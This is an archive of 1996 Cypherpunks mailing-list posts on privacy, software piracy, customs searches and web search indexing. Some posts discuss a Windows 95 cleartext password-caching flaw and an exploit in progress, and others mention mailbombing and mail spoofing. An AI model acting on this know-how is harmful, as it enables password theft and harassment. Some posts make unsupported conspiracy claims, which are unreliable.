Content-Type: text/plain


This will be of some interest to the people on this list...


>From: freematt@coil.com (Matthew Gaylor)
>Subject: Cybercrime & Privacy Issues AOL FBI discussion
>
>If you have an AOL account you may wish to join the below online discussion.
>
>Cybercrime & Privacy Issues
>
>On Wednesday evening, January 24, 1996 at 9pm EST in the Globe Auditorium
>of America Online (AOL), Mobile Office Productions will be hosting a candid
>interactive discussion with the FBI's Jim Kallstrom, who is working to
>shape procedures regarding computer privacy issues and cybercrime.
>
>This topic is of vital importance to all of us and we urge you to join us on
>January 24th at 9pm EST in the Globe Auditorium with your comments, questions
>and experiences.
>
>************** E-Mail: freematt@coil.com ************
>Matthew Gaylor
>1933 E.Dublin-Granville Rd., # 176
>Columbus, OH  43229
>
>I maintain the Electronic Frontier Foundations' Online Activism Resource
>List FAQ. An ACTION/EFF FAQ. Please send me sources of privacy/free-speech
>civil-liberties advocacy and general online activism tool/resources. Please
>send your hardcopy materials to my snail address.
>
>Available on the web at: http://www.eff.org/pub/Activism/activ_resource.faq
>And archived at: ftp.eff.org, /pub/Activism/activ_resource.faq
>
>######################TANSTAAFL
>"We can foresee a time when...the only people at liberty will be prison guards
>who will then have to lock up one another.  When only one remains, he will be
>called the 'Supreme Guard; and that will be the ideal society in which
>problems of opposition, the headache of all twentieth century governments,
>will be settled once and for all."        Albert Camus
>
>
>
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ue@alpha.c2.org (Unseen Entity)
Date: Wed, 17 Jan 1996 22:11:43 +0800
To: cypherpunks@toad.com
Subject: Re: PGP for CP/M?
In-Reply-To: <m0tbzuO-00095oC@pacifier.com>
Message-ID: <199601160814.AAA23090@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


jimbell@pacifier.com (jim bell) wrote:

>Okay, everybody, you can stop laughing now.  I don't really want a copy of
>PGP for CP/M, but I was just a bit curious as to whether anybody had ever
>ported it to CP/M.  Nostalgia reasons, primarily.

Dunno about CP/M, but I started a port to the Apple II.  I never finished
it, but I've got a nice MD5 written in 6502 assembly if you want it.  :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 16 Jan 1996 14:18:46 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Eggs at Customs (fwd)
Message-ID: <199601160518.AAA05251@pipe10.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 15, 1996 16:30:29, 'Rich Graves <llurch@networking.stanford.edu>'
wrote: 
 
 
>On Mon, 15 Jan 1996, Lindsay Haisley wrote: 
> 
>> There has (fortunately!) been a big crackdown recently on the illegal
pet 
>> bird import trade,... 
>> 
 
> 
>And here I thought it was because eggs were a good medium for  
>transporting biotoxins. 
> 
>I've been hanging out with you conspiracy freaks too much :-) 
> 
>-rich 
> 
 
You mean you actually believe the Jesuit/Masonic/ cover story about pet
birds!! How naive can you get!!! 
 
-- 
tallpaul 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 16 Jan 1996 17:01:50 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Respect for privacy != Re: exposure=deterence?
In-Reply-To: <m0tc1KD-000918C@pacifier.com>
Message-ID: <Pine.ULT.3.91.960116000038.29666r-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jan 1996, someone using the name jim bell wrote:

> I've decided to post this to Cypherpunks.  Forgive me, it's only marginally
> on-topic, but I think it's vital for the public to know how Richard Graves
> thinks.

[Apologies to everyone for not just kill-filing this.]

If it's all the same to you, I'd prefer to tell them myself, in context,
in public posts rather than in off-topic redistributed private email. 

In the last year I've inaccurately been labeled a Nazi, a Communist, a
Maoist, a Jew, an Anti-Semite, a KKK tool, an Anarchist, a Spic-Lover, a
Capitalist Stooge, a Tool of the Ruling Class if not an Oppressor Myself,
and a lawyer. 

Now I'm a Fucking Statist. Oh well. I defer to your four years' experience
on FIDONet, where you talked to "dozens" of people, who I am sure know
more about alternative political systems than the folks I worked with in
my four years studying Latin American history and political science at
Stanford. For example, Roberta Lajous, international affairs chair of the
Mexican PRI, who is a very intelligent and fair-minded person, but who can
accurately be described as a Fucking Statist, and Rodolfo Stavenhagen, a
Professor at el Colegio de Mexico who spoke at the recent Conference of
Indigenous Peoples called by el Ejercito zapatista de liberacion nacional.
Not to mention the Cubans, Sandinistas, Contras, and Salvadoran liberation
theologists I've known, four of whom were murdered in cold blood at their
seminary, in 1992 I believe. My good friend Istvan Feher lobbed Molotav
cocktails at Russian tanks on his way out of Budapest in 1956, and my last
serious girlfriend was a political refugee from Czechoslovakia who was
studying Soviet politics (you see, I haven't had a serious relationship
for a while). 

I simply prefer civilization to revolution, and structured ethical
restraint to retaliation. I believe government derives its just powers
from the consent of the governed with the purpose of securing fundamental
rights, and that there are such things as justice, consent, and
fundamental rights such as personal privacy that must not be abridged by
any body, whether defined as a government or not. 

Since I'm obviously a tool of the government who doesn't deserve privacy,
why not post everything you can find about me? I assure you that you could
find something quite damaging if you tried. I'll even give you hints in
private email if you like. 

I *double-dare* you.

*PLONK*

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Tue, 16 Jan 1996 14:09:12 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Eggs at Customs AND a quick question
In-Reply-To: <ad20333b0002100438e8@[205.199.118.202]>
Message-ID: <m0tc4Px-000jQZC@gti.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


- From the node of Timothy C. May:
: 
: P.S. I am persuaded that the importation of rare tropical birds into the
: U.S. is a GOOD THING, and that the attempts to ban such imports are
: misguided eco-fundie efforts. Diversity will be enhanced by having the
: birds in the U.S., and if left in their native jungles, most will die
: anyway. Better a pampered tropical bird in a gilded cage than lunch for
: some predator, or starvation as the jungles are cleared by slash-and-burn
: farmers.

Aside from the amusing belief that caged life is preferrable, let me point
out that importation of species can be pretty nasty.  Zebra mussels in the
Great Lakes, Mongooses in Hawaii, those nasty snakes from Guam ... etc, etc.


: 
: The same data transparency of borders, where truckloads of stuff come in
: easily, means that truckloads of birds, eggs, embryos, babies, etc. can
: also make it in. Most such shipments are only caught when surveillance
: yields a shipping schedule...such surveillance is becoming more and more
: difficult because of the technologies we push.

All right!  Horseman #5 ... the bird smuggler ;)



PS -- Going to consolidate posts here.  Can someone recommend a good 
text for an intro to Number Theory?


- -----
Mark Rogaski           100,000 lemmings     rogaski@pobox.com 
aka Doc, wendigo        can't be wrong!     http://www.pobox.com/~rogaski/

VMS is as secure as a poodle encased in a block of lucite 
						... about as useful, too.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPs+AdT48ZIkMoEtAQEd0Qf7BPYNJJCqRXmrA76oEFZ0PJdaQ5A7YXRh
bgvBlH1AwLTRCRooqR1lNdp1+Hc8Y2KuYu3GXWHKhttoVRVMkdnBqgzKv/9nZWw/
bCfUxmhDgdVbEBuxxg3Czpzov72g1rqDisFzr6v6ukz8Q9mJKzLI6lPuPMIP4Ebi
HI58uDXokdCjp7atL6ubndX2TptHiz00qszPZp9NUphJJAtAqB4N0geTzK1JK1/B
xSdhsDtYT4fVV2DbFZUu+K/0jPBDCRGDD5pOkATmR79utmspYCScTRAYlnumVoPS
ALKME0ATPdbeSE1Kjn1Yf++20XxnSAb9JjSO19e3X9ZcMKeq7Vw/CQ==
=iJzW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Wed, 17 Jan 1996 19:33:48 +0800
To: cypherpunks@toad.com
Subject: Re: Novell & Microsoft Settle Largest BBS Piracy Case Ever
In-Reply-To: <Pine.SUN.3.91.960115223141.25666A-100000@rwd.goucher.edu>
Message-ID: <199601160904.BAA27439@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


jlasser@rwd.goucher.edu (Jon Lasser) wrote:
> End of goverments = decline (but not end) of software markets?

It's already happening anyway.  In a few years (if not today) Microsoft is
going to be hard pressed to come up with excuses why someone should pay $90
for Doze-95 when they can get a Linux CDROM for less than $20 (or ftp it
for free).  With WINE and DOSEMU, that Linux system will run most of the
same software too.  Willows software recently released their own windoze
emulator for Linux for practically nothing (there is a small fee for
commercial use, free otherwise).

Look at Netscape, giving away their browser for free and how Microsoft
finally gave in and did the same because they couldn't sell theirs.

Selling software is going to become practically impossible within a few
years, and prosecuting piracy will become even more fruitless.  Rather,
more and more companies will give the software away for free, and sell
their expertise.

Sure, they will still package it nicely in a box to sell it to corporate
types who are afraid of ftp, but what they're really selling is not the
software but the tech support number.  Anyone can get more software than
they will ever use from the various ftp sites.  Mr. Corporate Executive
doesn't want to waste his time checking out the latest offerings on the
net, but he will pay to have a reliable program delivered to him that
can be installed easily, by a company that will be happy to answer his
questions about it.

Companies like Red Hat and Walnut Creek are doing brisk business selling
cdroms full of software that you can get for free.  You can search the net
for interesting stuff for months on end, or you can get all the best stuff
on one disk from them for twenty bucks.

And look at Sun Microsystems - they're giving away all their software for
free.  But when someone wants a reliable network server, who are they
going to call?  Sun.  Software doesn't sell, but expertise does, and
giving away well-written software is an excellent way to demonstrate your
expertise to a large audience.

The concept of copyright is pretty much dead; the free market has invented
new solutions.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 16 Jan 1996 18:01:48 +0800
To: cypherpunks@toad.com
Subject: Re: Novell & Microsoft Settle Largest BBS Piracy Case Ever
In-Reply-To: <199601160904.BAA27439@infinity.c2.org>
Message-ID: <Pine.ULT.3.91.960116013955.29666t-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Jan 1996, Anonymous wrote:

> jlasser@rwd.goucher.edu (Jon Lasser) wrote:
> > End of goverments = decline (but not end) of software markets?
> 
> It's already happening anyway.  In a few years (if not today) Microsoft is
> going to be hard pressed to come up with excuses why someone should pay $90
> for Doze-95 when they can get a Linux CDROM for less than $20 (or ftp it
> for free).  With WINE and DOSEMU, that Linux system will run most of the
> same software too.  Willows software recently released their own windoze
> emulator for Linux for practically nothing (there is a small fee for
> commercial use, free otherwise).

Hogwash. WINE isn't nearly finished, and DOSEMU won't run a lot. They 
certainly won't run the newer 32-bit applications that MS wrote to 
require DDE and other stuff.

> Look at Netscape, giving away their browser for free and how Microsoft
> finally gave in and did the same because they couldn't sell theirs.

Netscape does not give away its browser for free, or at least they don't
intend to. You're supposed to pay for it if you use it for anything other
than educational or non-profit org use (not non-commercial use -- for
personal non-commercial use, you're supposed to pay). Of course this 
isn't very tightly enforced.
 
> Selling software is going to become practically impossible within a few
> years, and prosecuting piracy will become even more fruitless.  Rather,
> more and more companies will give the software away for free, and sell
> their expertise.
> 
> Sure, they will still package it nicely in a box to sell it to corporate
> types who are afraid of ftp, but what they're really selling is not the
> software but the tech support number.

Have you ever tried tech support?

Microsoft has never offered toll-free tech support as a matter of policy. 
You get a limited amount of support via a toll call to Redmond. Other 
companies are only a little better.

People still buy software, and a lot of it.

> Companies like Red Hat and Walnut Creek are doing brisk business selling
> cdroms full of software that you can get for free.  You can search the net
> for interesting stuff for months on end, or you can get all the best stuff
> on one disk from them for twenty bucks.
> 
> And look at Sun Microsystems - they're giving away all their software for
> free.  But when someone wants a reliable network server, who are they
> going to call?  Sun.  Software doesn't sell, but expertise does, and
> giving away well-written software is an excellent way to demonstrate your
> expertise to a large audience.
> 
> The concept of copyright is pretty much dead; the free market has invented
> new solutions.

I agree that copyright is dying, or should die, but I am not convinced
that we have a solution. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 16 Jan 1996 11:12:15 +0800
To: bryce@colorado.edu
Subject: Re: mailbombing and anonymity -- inseparable
In-Reply-To: <199601152251.PAA07589@nagina.cs.colorado.edu>
Message-ID: <Pine.BSD.3.91.960116024602.874A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



	if you get the usual 150+ msg/day I do, you break it up into
    folders, set the reader to proceed sequentially through the folders,
    in an order defined in .pinerc. I have 30 folders current.

	when a particular person becomes annoying:

	    # net assholes 

	    :0 HB 
	    * ( Fred.*Cohen|fc@all.net|vznuri|kevin.dirks )
	    assholes

    takes care of the problem nicely.  

	If you get bored with a newsletter, etc. I move its 
    folder address in procmail to "bigsleep" and every so 
    often I try to cancel the group.

	Now, if I wish to really get hostile, I have a little 
    program which returns the message showing "bounce@..." in 
    the From:, Reply-To:, and Sent-By: fields. At the top of the 
    body it 'shouts' the sender is objectionable and the mail
    returned.  It does keep a log of who it bounced and if it
    one of the no-return types, it 'learns' from another list 
    to use /dev/null.  

	There is no limit to how far you can go, including mail 
    bombing. spoofing the top line From is hard to do for lack 
    of insecure mailers, but it can be done by other means. The
    only spammer I have had trouble discouraging is nashville.net.
    But I really do not believe in mail bombing as it hurts too
    many bystanders --cheap to generate, but expensive to clean
    up after.

	So, indulge in procmail(), premail(), formail(), and 
    older versions of smail() and join the fun.

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 16 Jan 1996 20:10:48 +0800
To: cypherpunks@toad.com
Subject: Job offer for Computer Security Researcher
Message-ID: <199601161158.DAA20583@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


    Seen on ba.jobs.offered:

	Computer Security Research Position

The Distributed Information Technologies Center at Sandia National
Laboratories, in Livermore, California, is seeking a qualified
candidate for the position of Senior Member of the Technical Staff
in the area of computer security research.  The scope of security
research and development at Sandia is very broad, encompassing
elements that relate to networking, hosts, and protocols.  Examples
include high-speed encryption, advanced firewalls, detection systems,
and secure agents.  The focus of the research is to provide both
solutions to security issues relevant to the Laboratory as well as
contributions to the security technology base needed by the
National Information Infrastructure.  The security research staff
collaborate closely with the research groups that are involved with
distributed computing and advanced networking, with the goal of
providing a totally integrated solution to the information
infrastructure.  In addition to having the technical depth
necessary to conduct extensive research projects, this Senior
Staff Member will be expected to lead proposal efforts, serve as
team leader for projects, and maintain active membership in national
organizations that influence the direction of security research.

The successful candidate will have an advanced degree in computer
security or a related field.  In addition, candidates will be
evaluated on their demonstrated ability to formulate proposals,
perform in-depth research, and report results in the form of papers
and presentations.

A U.S. citizenship is required for this position.  Interested
candidates should send their resumes to:
    
    	Peter Dean, Manager Networking Research Department 8910
    	Sandia National Laboratories
	PO Box 969, MS9011
    	Livermore, CA 94551-0969

    	(510) 294-2656
    	pwdean@sandia.gov





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 16 Jan 1996 16:38:19 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <Pine.SV4.3.91.960115221608.3397A@larry.infi.net>
Message-ID: <Pine.BSD.3.91.960116073156.8962B-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



	well, Mr. Horrowitz, I once had a strong belief in democracy
    and the U.S. Constitution, particularly the Bill of Rights.

****** IMPORTANT, get your BS detector working!

	you'd probably call me a lying asshole if I told you your
    _beloved_ Bubba signed PPD 25 which permits UN control of US
    forces, _in America_!  and allows the UN to bring in UN troops.

	and, your meter will really peg out if I told you the DOD
    gave Navy Seals and Marine Recon units a long questionaire to
    determine their "loyalty" and they even asked "under an order
    to confiscate weapons from US citizens ...would you shoot to 
    kill [US citizens] who refused to surrender their weapons 
    if so ordered by UN officers?
  
	and, you'll scream "liar" if I tell you that the Department
    of the Navy is not subject to the posse comitase act which prevents
    the Army from being used in civilian affairs. Guess where the
    United States Marine Corps, the finest shock troops in history 
    are (125,000 fighting men currently)  --Navy.

	maybe you should review the procedures for the Feds --they
    have 72 hours to charge you or release you  --more if they are
    lucky enough to bag their prey after 4pm Friday --they are not
    even required to give you a phone call until you have been read
    your rights.  And, they don't read you your rights unless they
    charge you.

	second, check just what your rights are in US border check
    points --how about probable cause before they subject you to a
    strip search and body cavity check? how about liability for
    shredding your possessions if they want to be assholes, and 
    still find nothing? (you're real lucky if you get some Polish
    luggage (shopping bags)  how about some help to put your shit 
    back together?  how about a grievance procedure? --that's the 
    big joke.

	it's not INS, they couldn't give a shit about your politics,
    but if you name pops up when they "stripe" your passport, they
    pass that along to the FBI, DEA, and other LEs  

	check out LA next time you go through the Bradley gauntlet. 
    LA will take the time to punch in the numbers on a US FS passport,
    and US DP passports aint worth a shit in the US.  If they get a
    match, there's an army of those Fed blue jackets with the agency
    name on the back in large letters  --they're highly visible.

On Mon, 15 Jan 1996, Alan Horowitz wrote:

> My bullshit detector is starting to pin the needle.
> 
	your option. I'm not proselytizing!

> US Customs doesn't care about your political status or leanings. 
> They want to collect the proper excise and catch contraband.
> 
	what ever you say... but they get extra bonus points for 
    a rather large number of things.

> There are INS people at passport control.   I am skeptical that they 
> would detain a US passport holder for 36 hours. I would like to see some 
> evidence that this actually happened.
>
	well, I'm not passing my jacket --and you cant get it with FOIA

	anyway, it isn't the INS that detains...
 
> US citizens can't be excluded from the country, nor have their 
> citizenship taken away from them.
>
	which rock you been hiding under?
 
> Alan Horowitz
> alanh@norfolk.infi.net
> 
	remember, a conservative is a liberal, 
	who had his ass mugged last night.


__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Wed, 17 Jan 1996 04:09:16 +0800
To: "'cypherpunks@toad.com>
Subject: Re: Need confirmation of Win95 password encryption back door
Message-ID: <01BAE3EF.2418BD80@loki>
MIME-Version: 1.0
Content-Type: text/plain


A friend and I were working on an exploit of this.  It is true.  We were 
not working on a grepper, but we found the offset where the passwords 
reside and were going  to dump them into a dialog box.  If you are planning 
to exploit this, we will stop our previous efforts.
----------
From: 	Rich Graves[SMTP:llurch@networking.stanford.edu]
Sent: 	Monday, January 15, 1996 5:20 PM
To: 	cypherpunks@toad.com
Cc: 	frank@funcom.no; pgut01@cs.auckland.ac.nz
Subject: 	Need confirmation of Win95 password encryption back door

-----BEGIN PGP SIGNED MESSAGE-----

A Major Media Outlet requires confirmation that Windows 95, to facilitate
its automatic reconnect feature for sleeping laptops and temporary network
outages, caches all network passwords (NetWare, NT, UNIX running Samba,
SLIP/PPP dialup) in unprotected memory in clear text, whether you've
disabled persistent "password caching" to disk and applied the December
14th 128-bit RC4 .PWL patch, or not. There seems to be no way to turn
this off.

The idea, of course, is that a simple trojan horse could do whatever it
wanted with this information.

We know that this vulnerability exists in Windows for Workgroups, and
Peter wrote a little demo (on hackmsoft page below, without source), but
the APIs appear to have changed in Win95.

So, anyone have Win95 and some time to kill, or can anyone recommend a
good DOS/Windows RAM grepper?

- -rich@c2.org
 http://www.c2.org/hacknmsoft/

 $ Mon Jan 15 22:17:10 PST 1996 $
 $ From llurch@networking.stanford.edu to cypherpunks@toad.com $

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPtDLo3DXUbM57SdAQEN7QP+J6Gmk6m8dv3X96SKZciI/L7DM04bDSoi
HZa+dIoajAiRrfG9oSNcIYbVDDs67qwCSKGFg9hc5K3x99nhbq3Aw2mio62YQj+2
K62pBT9hQLe4dv8AMhLtIqyG4ZztYy+dDjGzsaUIkBUZKo5//Eh8c81xXLQrqXtk
RFV+xkXBgww=
=12rk
-----END PGP SIGNATURE-----






----------
Brian Gorka
Key fingerprint =  ED 7D 78 7E 95 E8 05 01  27 01 A1 74 FA 4B 86 53 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 17 Jan 1996 08:21:04 +0800
To: cypherpunks@toad.com
Subject: FEY_kry
Message-ID: <199601161409.JAA02954@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Supporting Kocher's feynmanesque cracking of sec systems,
   the WSJ reports today on new ways science "seeks answers to
   high-tech puzzles by examining the reckless and random ways
   of nature."

      The cold, digital domain of silicon-based technology is
      drawing inspiration from an unlikely source: the living,
      breathing realm of nature. Scientists are turning to a
      wide variety of natural models -- from the way salmon
      migrate to how the human body fights viruses to
      evolution -- for new approaches to problem-solving.

      "Our view of computer science is rationalistic,
      mechanistic. But nature winds up doing things in a way
      we'de never think of," one scientist says.

   FEY_kry












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 17 Jan 1996 02:11:12 +0800
To: tallpaul@pipeline.com
Subject: Re: Eggs at Customs (fwd)
In-Reply-To: <199601160518.AAA05251@pipe10.nyc.pipeline.com>
Message-ID: <Ry9+w8m9LQsU085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199601160518.AAA05251@pipe10.nyc.pipeline.com>,
tallpaul@pipeline.com (tallpaul) wrote:

>  
> You mean you actually believe the Jesuit/Masonic/ cover story about pet
> birds!! How naive can you get!!! 

The truth is that there is an exotic Brazilian/African animist cult,
similar to Vodoun and Santeria, one of whose rituals involves the
sacrifice of tropical birds to the loa.

Career diplomats in the State Department have covertly joined this cult
while in Brazil and have been spreading through the U.S. government. 
There is a deadly struggle going on right now between the cultists and
right-thinking Christians.  Currently the State Department, the FAA, the
Department of Energy (responsible for our nation's nuclear weapons
arsenal), and the Federal Aviation Administration are under the control
of the voodoo cultists;  At the forefront of the fight is the BATF,
Customs (hence the scrutiny at eggs on the border), and the Interior
Department. The Social Security Administration is the current battleground.

This is the real reason for the recent government closures.  (The
conveniently arranged budget standoff is another cover story.)

ObCypherpunks:  The head of the NSA is said to have attended two voodoo
rituals, although it has not been confirmed that he is a full member of
the cult.

- -- 
   Alan Bostick             | He played the king as if afraid someone else 
Seeking opportunity to      | would play the ace.
develop multimedia content. |      John Mason Brown, drama critic
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMPvfquVevBgtmhnpAQGnMAL/fC/TIg7R7kx2jRB8FV259cxqNwc/hZmf
/QuqBB2oWQXuYGbEAj7AYoKyqSPdS/Z6U3IDRsowi9QrCBlvqgMsrQsuc8zbE0ql
dtiL9fCTraWVMHQehmKX2FpnewaMqVye
=dCnF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 16 Jan 1996 23:35:14 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Crypto anarchist getting through customs
Message-ID: <v02130507ad211a4ff0aa@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:38 PM 1/15/96, Timothy C. May wrote:


>Frequent travellers to Europe will no doubt confirm what I'm saying. I
>travelled to dozens of countries in Europe a while back, and never was
>checked at any borders, save for a quick glance at my passport.
>
While this is generally true, I do remember that I decided to take an
overnight ferry/train ride between Paris and London to save money by
spending one less night on the hotel. I didn't get seasick, but I was very
disheveled when I got off the boat. The hours of 3 to 6 am were spent in the
ferry's duty-free shop because I was bored and I couldn't sleep.

The British customs guy pulled me over and started searching my bags and
questioning me. It went something like this:

"Are you aware of the duty-free restrictions?"

"Yes. You can bring in up to four liters of wine and one liter of hard
liquor. Or you can use your one liter alotment of hard liquor on wine and
bring in a five liter jug. Cigarettes must be limited to..........."

"Okay, you can go on."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 16 Jan 1996 17:51:46 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Anon Proxy / Re: Information Sent by Netscape during Queries
In-Reply-To: <v01530503ad20cfd1d938@[199.184.183.25]>
Message-ID: <9601160936.AA03366@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



Just to remind that I'm running and made available a couple of
months ago an anonymous proxy which drops all those nasty infos
see
http://hplyot.obspm.fr:6661/
to have a look at those headers

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Greenpeace [Hello to all my fans in domestic surveillance] Clinton
 radar Croatian AK-47 security




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Wed, 17 Jan 1996 04:32:15 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Spiderspace
In-Reply-To: <ad2127120b02100482d3@[205.199.118.202]>
Message-ID: <Pine.LNX.3.91.960116110942.164C-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 16 Jan 1996, Timothy C. May wrote:

> 1. At the Saturday Cypherpunks physical meeting, Marianne Mueller (I think)
> was telling me about an experience where an old letter she'd written to
> someone showed up in an Alta Vista search. A personal letter, that is. How
> this happened was that the letter to her friend was buried several
> subdirectories deep in a directory he made accessible to the outside world.
> Presto, Alta Vista found it, indexed it, and made it keyword-searchable!

Minor correction, it was a private e-mail that I had sent to Marianne 
over a year ago that showed up in an AltaVista search.  (It was a 
completely inadvertant mistake on her part that this happened.)

Funny to me, embarrassing to her, and a perfect (though trivial) example of 
how the evolution of "spiderspace" will, until people become more 
familiar with it, reveal all sorts of unexpected surprises.

--
Johnathan Corgan
jcorgan@aeinet.com
http://www.aeinet.com/jcorgan.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 17 Jan 1996 02:50:16 +0800
To: cypherpunks@toad.com
Subject: Spiderspace
Message-ID: <ad2127120b02100482d3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I've been thinking a lot about the problems and opportunities that are
coming up as more and more "spiders" (Web searchers, crawlers) are indexing
directories and files on systems they can find.

For the sake of this post, the files and whatnot these spiders and
super-spiders can hit constitute a universe I'll call "spiderspace," as it
semi-euphoniously matches cyberspace and cypherspace.

Two things caused me to think more intensely abou this:

1. At the Saturday Cypherpunks physical meeting, Marianne Mueller (I think)
was telling me about an experience where an old letter she'd written to
someone showed up in an Alta Vista search. A personal letter, that is. How
this happened was that the letter to her friend was buried several
subdirectories deep in a directory he made accessible to the outside world.
Presto, Alta Vista found it, indexed it, and made it keyword-searchable!

(Humans are pretty bad at doing such meticulous file prep work, but
all-seeing spiders are very good at seeing everything.)

2. Someone on the Cyberia-l list, Mike Godwin in fact, asked if anyone had
a particular post he'd written last summer, a post he'd neglected to save
but that he needed. I had not kept that post, according to my own archives,
but I decided to see what Alta Vista might turn up. (The Cyberia-l list is
not officially archived, and I believe archives of it are discouraged by
the list owner, for various reasons especially worrisome to lawyers and law
professors!)

Sure enough, a search of "Cyberia-l" in Alta Vista showed all sorts of
hits, including what appeared to be several _private archives_ of parts of
the traffic. (By "private" I mean in the sense that they were someone's
personal archives, and not necessarily complete or even semi-officially
sanctioned.)

And a search of "Cyberia-l AND Godwin AND parental AND Ferber" (some of the
keywords in the post he knew he was looking for) produced two hits, most
probably of the post he was seeking. (They were on a Kent Law School
archive site that, I believe, is no longer accessible to the outside...the
Alta Vista spiders must have gotten to it and indexed it before the site
was made less accessible...just a thought.)

This fits with the point made above, that increasing numbers of odd
things--letters, love letters, resumes, job applications, even things like
PGP passwords!--will likely show up by accident in spiderspace.

I've started to look for things like PGP files laying around buried in
subdirectories. I can imagine attacks based on this.

Declan McCullagh, on the Cyberia-l list, followed up to my post on this
topic by noting that things will really get interesting when the internal
file systems of many sites are made searchable, such as with the Andrew
File System (AFS) at CMU and elsewhere. Apparently most users make their
directories accessible to others.

Implications for Cypherpunks?

First, an alert for you to be very careful about what you make accessible
to the outside world. It's no longer just a matter of people taking the
time to rummage through your subdirectories, it's now trivial to find
things with the new Web search engines.

Second, what is out there in spiderspace is incredibly useful for building
dossiers, for compiling correlations, and for doing competitive analyses.

Third, more and more kinds of files are going into spiderspace. This may
include files compiled by others, such as files containing Web accesses!
(All it takes is for someone to keep a record of site accesses,
subscriptions, etc., and then put record in a searchable place: it then
becomes trivial to search on a name and find out interesting things.)

Fourth...left to your imagination.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 17 Jan 1996 02:05:38 +0800
To: Mark Rogaski <wendigo@pobox.com>
Subject: Better diversity through cages (?!)
In-Reply-To: <m0tc4Px-000jQZC@gti.gti.net>
Message-ID: <9601161734.AA27525@cfdevx1.lehman.com>
MIME-Version: 1.0
